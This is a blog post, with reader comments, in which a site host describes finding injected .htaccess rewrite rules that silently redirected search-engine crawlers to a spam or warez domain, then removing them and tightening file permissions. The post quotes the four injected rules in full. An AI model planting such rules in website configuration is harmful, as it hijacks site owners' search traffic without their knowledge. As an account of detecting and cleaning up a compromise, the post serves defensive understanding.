Finding the nonexistent
So much for a quiet Paddy’s Day.
As The Old Fart wrote yesterday, we had a bit of trouble on the server. He claimed credit for finding the cause, but he really hasn’t a clue.
The symptom of the problem was that the blogs that I host seemed to vanish off Google’s radar. Any search for example for ‘head rambles’ would only produce old results, while the newer material just failed to appear at all.
I ran the usual tests, and Google reported that the sites were fine and were being spidered on a regular and frequent basis, so what the hell was going on?
I checked the logs for a couple of the blogs and found some very unusual activity. There was indeed a phenomenal number of visits to the sites from Google, but they were successfully finding files and directories that didn’t exist!
How do you successfully find something that doesn’t exist? For a while I was baffled.
I think it was more intuition and luck than logic, but I checked the .htaccess files and there it was in all its glory – a hack.
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://doormoney.biz/ [R=301,L]
Somehow [and I still don’t know quite how] they managed to modify each .htaccess file and add those lines.
The upshot was that Google was visiting what it thought was my sites, but in fact was that other site, which as far as I can make out is a warez site.
Needless to say, I removed the lines and locked down the files, and immediately Google started getting a 404 [not found] instead of a 200 [successful] so that solved that.
Since then, one of my Elite Bloggers posted an article, and it appeared within fifteen minutes in Google
I did a wee search around the Internet to see if this was a common hack and it is not unknown. I found a couple of interesting articles on it here and here.
So someone else had a wasted Paddy’s Day too?
I am not alone.
What a clever way to do things. Hope the perpetrator dies of bleeding piles.
I checked mine just to make sure and all clear on that account. Stands to reason since there’s mighty slim pickings over at my place.
So we’ve chmod’d the .htaccess file to something other than 777 now? 😉
Kirk M beat me too it as I was going to suggest changing permissions on .htaccess. Typically it is left writable as some wordpress plugins need to access it.
Still, it doesn’t explain how they over wrote it in the first place.
I found this article helpful in the past:
http://www.linux.com/articles/113974?theme=print
One of my tech buddies is working on a .htaccess monitor, which should be interesting.
777? All 644. 😈
I think I figured it out. I’ll shoot you an email.
Hmm my earlier comment got lost in the ether 😐
You have better write it again then Robert?
Can’t remember what it was now but it did have a link and probably fell foul of yer filters!
Yup. You are a spammer!!!
Not intentionally 😉
just saw this on a client site, did you ever track down the source of this junk?
Welcome, Matt! No. I never heard anything more about it. One of those little mysteries sent to annoy us.